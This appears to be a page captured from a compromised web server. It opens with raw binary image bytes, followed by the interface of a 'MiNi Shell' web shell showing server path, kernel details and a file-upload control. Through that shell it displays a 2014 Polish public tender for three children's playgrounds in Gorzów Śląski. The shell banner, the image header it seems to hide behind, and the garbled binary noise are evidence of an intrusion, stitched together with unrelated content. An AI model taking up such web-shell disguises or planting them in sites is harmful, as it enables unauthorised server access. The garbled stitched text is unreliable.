JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140922/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140922/313276-N-2014.html

<p class="kh_header"><b>Gorzów Śląski: Rozwijanie małej infrastruktury turystycznej poprzez utworzenie miejsca wypoczynkowego w miejscowościach: Jamy, Jastrzygowice, Krzyżanowice.</b><br>
<b>Numer ogłoszenia: 313276 - 2014; data zamieszczenia: 22.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gorzów Śląski , ul. Wojska Polskiego 15, 46-310 Gorzów Śląski, woj. opolskie, tel. 034 3505710, 715, faks 034 3505710, 715 wew. 42.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gorzowslaski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozwijanie małej infrastruktury turystycznej poprzez utworzenie miejsca wypoczynkowego w miejscowościach: Jamy, Jastrzygowice, Krzyżanowice..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:

Część 1
Rozwijanie małej infrastruktury turystycznej poprzez utworzenie miejsca wypoczynkowego w miejscowości Jamy.
Plac zabaw dla dzieci na działce nr ew. 736/130 w miejscowości Jamy, gmina Gorzów Śląski. 
Na placu zostaną zamontowane bezpieczne urządzenia zabawowe o wysokiej jakości - trwałe, kolorowe i estetyczne. Na placu znajdować się będą następujące urządzenia zabawowe jak również wyposażenie parkowe tj.: 
zestaw wspinalni i zjeżdżalni szt.1, zestaw pomostów i zjeżdżalni szt.1, huśtawka stojakowa z dwoma zawieszanymi siedziskami (kładka i pampers) szt.1. huśtawka równoważnia szt.1, huśtawka wahadłowa szt.1, piaskownica szt.1, huśtawka sprężynowa szt.2, karuzela talerzowa szt.1, ławka drewniana z oparciem szt.2, kosz na śmieci szt.1, tablica informacyjna z regulaminem placu zabaw szt.1.
W zakresie niniejszej inwestycji wykonane zostanie ogrodzenie placu zabaw. 
Rozmieszczenie poszczególnych urządzeń pokazano na projekcie zagospodarowania działki. 
Szczegółowy zakres zamówienia stanowi szczegółowy opis przedmiotu zamówienia (zał.nr8 do SIWZ) oraz dokumentacja projektowa (zał.nr11 do SIWZ).

Część 2
Rozwijanie małej infrastruktury turystycznej poprzez utworzenie miejsca wypoczynkowego w miejscowości Jastrzygowice.
Plac zabaw dla dzieci na działce nr ew. 410/14 w miejscowości Jastrzygowice, gmina Gorzów Śląski. 
Na placu zostaną zamontowane bezpieczne urządzenia zabawowe o wysokiej jakości - trwałe, kolorowe i estetyczne. Na placu znajdować się będą następujące urządzenia zabawowe jak również wyposażenie parkowe tj.: 
zestaw wspinalni i zjeżdżalni szt.1, zestaw pomostów i zjeżdżalni szt.1, huśtawka stojakowa z dwoma zawieszanymi siedziskami (kładka i pampers) szt.1. huśtawka równoważnia szt.1, huśtawka wahadłowa szt.1, piaskownica szt.1, huśtawka sprężynowa szt.2, karuzela talerzowa szt.1, ławka drewniana z oparciem szt.2, kosz na śmieci szt.1, tablica informacyjna z regulaminem placu zabaw szt.1, urządzenie do treningu typu orbitrek szt.1, urządzenie treningowe - wyciąg górny szt.1.
W zakresie niniejszej inwestycji wykonane zostanie ogrodzenie placu zabaw i przebudowa chodnika. 
Rozmieszczenie poszczególnych urządzeń pokazano na projekcie zagospodarowania działki. 
Szczegółowy zakres zamówienia stanowi szczegółowy opis przedmiotu zamówienia (zał.nr9 do SIWZ) oraz dokumentacja projektowa (zał.nr12 do SIWZ).


Część 3
Rozwijanie małej infrastruktury turystycznej poprzez utworzenie miejsca wypoczynkowego w miejscowości Krzyżanowice.
Plac zabaw dla dzieci na działce nr ew. 290/2 w miejscowości Krzyżanowice, gmina Gorzów Śląski. 
Na placu zostaną zamontowane bezpieczne urządzenia zabawowe o wysokiej jakości - trwałe, kolorowe i estetyczne. Na placu znajdować się będą następujące urządzenia zabawowe jak również wyposażenie parkowe tj.: 
zestaw wspinalni i zjeżdżalni szt.1, zestaw pomostów i zjeżdżalni szt.1, huśtawka stojakowa z dwoma zawieszanymi siedziskami (kładka i pampers) szt.1. huśtawka równoważnia szt.1, huśtawka wahadłowa szt.1, piaskownica szt.1, huśtawka sprężynowa szt.2, karuzela talerzowa szt.1, ławka drewniana z oparciem szt.2, kosz na śmieci szt.1, tablica informacyjna z regulaminem placu zabaw szt.1, urządzenie do treningu typu orbitrek szt.1, urządzenie treningowe - wyciąg górny szt.1.
W zakresie niniejszej inwestycji wykonane zostanie ogrodzenie placu zabaw. 
Rozmieszczenie poszczególnych urządzeń pokazano na projekcie zagospodarowania działki. 
Szczegółowy zakres zamówienia stanowi szczegółowy opis przedmiotu zamówienia (zał.nr10 do SIWZ) oraz dokumentacja projektowa (zał.nr13 do SIWZ)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.23.62.10-5, 45.11.27.23-9, 37.53.51.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 08.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia    
          nie wymaga posiadania specjalnych uprawnień.
          Zamawiający dokona oceny spełnienia warunku na podstawie złożonego   
          oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
           Zamawiający dokona oceny spełnienia warunku na podstawie złożonego    
           oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
           Zamawiający dokona oceny spełnienia warunku na podstawie złożonego    
           oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
           Zamawiający dokona oceny spełnienia warunku na podstawie złożonego    
           oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
           Zamawiający dokona oceny spełnienia warunku na podstawie złożonego    
           oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) Dokumenty (certyfikaty) poświadczające że oferowane urządzenia są zgodnie 
z aktualną normą PN-EN 1176-1-11:2009 Wyposażenie placów zabaw i nawierzchnie.

2) W zakresie części 1,2,3 przedmiotu zamówienia w celu potwierdzenia że oferowane  
urządzenia zabawowe odpowiadają wymaganiom określonym przez Zamawiającego , 
Zamawiający żąda dołączenia do oferty rysunków, zdjęć lub katalogów ze  
wskazaniem oferowanych urządzeń wraz z wymiarami oraz opisem elementów składowych.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy - wypełniony i podpisany przez wykonawcę (zał. nr1,2,3 do SIWZ)
Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów ( wiedzy i doświadczenia, potencjału technicznego, osób zdolnych do wykonania zamówienia lub zdolności finansowych, na okres korzystania z nich przy wykonywaniu zamówienia jeżeli Wykonawca wykazał, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia.
Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zamiany umowy będą potwierdzone aneksem w formie pisemnej pod rygorem nieważności.
2.Zmiany postanowień  umowy będą mogły nastąpić w następujących okolicznościach:

     a)    zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:
-      o charakterze niezależnym od stron,
-      którego strony nie mogły przewidzieć przed zawarciem umowy,
-      którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu 
       należytej staranności;
-      której nie można przypisać drugiej stronie;                
       Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki  terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia;
b)     zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron;
c)      powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony;
d)    zmianę kierownika robót/budowy w przypadku wystąpienia o zmianę na wniosek
Zamawiającego lub Wykonawcy po uzyskaniu zgody Zamawiającego;
e)   wystąpienia istotnych wad dokumentacji projektowej skutkującej koniecznością dokonania poprawek lub uzupełnień, jeżeli uniemożliwia to lub istotnie wstrzymuje realizację określonego rodzaju robót mających wpływ na zmianę terminu realizacji - zmianie ulegnie odpowiednio termin realizacji zamówienia;
f)   zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie może ulec termin realizacji Umowy 
g)       w przypadku wystąpienia robót/zamówień dodatkowych Zamawiający wydłuży termin o czas niezbędny do ich wykonania jeżeli na konieczność ich wykonania niemożliwe jest       dotrzymanie określonego w umowie terminu na roboty podstawowe,
h)      zmiany osób i podmiotów zdolnych do wykonania zamówienia, w przypadku zdarzeń   losowych niezależnych od Wykonawcy, na uzasadnione wystąpienie Wykonawcy.
i)    zmiany ustawowej wysokości podatku VAT, w przypadku gdy w trakcie realizacji przedmiotu umowy nastąpi zmiana stawki podatku VAT dla robót objętych przedmiotem umowy.
Strony dokonają odpowiedniej zmiany wynagrodzenia umownego- dotyczy to części wynagrodzenia za roboty w których w dniu zmiany stawki podatku VAT jeszcze nie wykonano.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gorzowslaski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Gorzowie Śląskim
ul. Wojska Polskiego 15
46-310 Gorzów Śląski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.10.2014 godzina 10:30, miejsce: Pokój nr 3 ( sekretariat )
w siedzibie zamawiającego 
Urząd Miejski w Gorzowie Śląskim
ul. Wojska Polskiego 15
46-310 Gorzów Śląski.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 05.11.2014.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja jest współfinansowania w ramach umowy o przyznanie pomocy  
    wdrażanie lokalnych strategii rozwoju, objętego PROW na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rozwijanie małej infrastruktury turystycznej poprzez utworzenie miejsca wypoczynkowego w miejscowości Jamy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Plac zabaw dla dzieci na działce nr ew. 736/130 w miejscowości Jamy, gmina Gorzów Śląski. 
Na placu zostaną zamontowane bezpieczne urządzenia zabawowe o wysokiej jakości - trwałe, kolorowe i estetyczne. Na placu znajdować się będą następujące urządzenia zabawowe jak również wyposażenie parkowe tj.: 
zestaw wspinalni i zjeżdżalni szt.1, zestaw pomostów i zjeżdżalni szt.1, huśtawka stojakowa z dwoma zawieszanymi siedziskami (kładka i pampers) szt.1. huśtawka równoważnia szt.1, huśtawka wahadłowa szt.1, piaskownica szt.1, huśtawka sprężynowa szt.2, karuzela talerzowa szt.1, ławka drewniana z oparciem szt.2, kosz na śmieci szt.1, tablica informacyjna z regulaminem placu zabaw szt.1.
W zakresie niniejszej inwestycji wykonane zostanie ogrodzenie placu zabaw. 
Rozmieszczenie poszczególnych urządzeń pokazano na projekcie zagospodarowania działki. 
Szczegółowy zakres zamówienia stanowi szczegółowy opis przedmiotu zamówienia (zał.nr8 do SIWZ) oraz dokumentacja projektowa (zał.nr11 do SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.23.62.10-5, 45.11.27.23-9, 37.53.51.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 08.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rozwijanie małej infrastruktury turystycznej poprzez utworzenie miejsca wypoczynkowego w miejscowości Jastrzygowice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Plac zabaw dla dzieci na działce nr ew. 410/14 w miejscowości Jastrzygowice, gmina Gorzów Śląski. 
Na placu zostaną zamontowane bezpieczne urządzenia zabawowe o wysokiej jakości - trwałe, kolorowe i estetyczne. Na placu znajdować się będą następujące urządzenia zabawowe jak również wyposażenie parkowe tj.: 
zestaw wspinalni i zjeżdżalni szt.1, zestaw pomostów i zjeżdżalni szt.1, huśtawka stojakowa z dwoma zawieszanymi siedziskami (kładka i pampers) szt.1. huśtawka równoważnia szt.1, huśtawka wahadłowa szt.1, piaskownica szt.1, huśtawka sprężynowa szt.2, karuzela talerzowa szt.1, ławka drewniana z oparciem szt.2, kosz na śmieci szt.1, tablica informacyjna z regulaminem placu zabaw szt.1, urządzenie do treningu typu orbitrek szt.1, urządzenie treningowe - wyciąg górny szt.1.
W zakresie niniejszej inwestycji wykonane zostanie ogrodzenie placu zabaw i przebudowa chodnika. 
Rozmieszczenie poszczególnych urządzeń pokazano na projekcie zagospodarowania działki. 
Szczegółowy zakres zamówienia stanowi szczegółowy opis przedmiotu zamówienia (zał.nr9 do SIWZ) oraz dokumentacja projektowa (zał.nr12 do SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.23.62.10-5, 45.11.27.23-9, 37.53.51.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 08.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Rozwijanie małej infrastruktury turystycznej poprzez utworzenie miejsca wypoczynkowego w miejscowości Krzyżanowice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Plac zabaw dla dzieci na działce nr ew. 290/2 w miejscowości Krzyżanowice, gmina Gorzów Śląski. 
Na placu zostaną zamontowane bezpieczne urządzenia zabawowe o wysokiej jakości - trwałe, kolorowe i estetyczne. Na placu znajdować się będą następujące urządzenia zabawowe jak również wyposażenie parkowe tj.: 
zestaw wspinalni i zjeżdżalni szt.1, zestaw pomostów i zjeżdżalni szt.1, huśtawka stojakowa z dwoma zawieszanymi siedziskami (kładka i pampers) szt.1. huśtawka równoważnia szt.1, huśtawka wahadłowa szt.1, piaskownica szt.1, huśtawka sprężynowa szt.2, karuzela talerzowa szt.1, ławka drewniana z oparciem szt.2, kosz na śmieci szt.1, tablica informacyjna z regulaminem placu zabaw szt.1, urządzenie do treningu typu orbitrek szt.1, urządzenie treningowe - wyciąg górny szt.1.
W zakresie niniejszej inwestycji wykonane zostanie ogrodzenie placu zabaw. 
Rozmieszczenie poszczególnych urządzeń pokazano na projekcie zagospodarowania działki. 
Szczegółowy zakres zamówienia stanowi szczegółowy opis przedmiotu zamówienia (zał.nr10 do SIWZ) oraz dokumentacja projektowa (zał.nr13 do SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.23.62.10-5, 45.11.27.23-9, 37.53.51.00-8.</p></li>
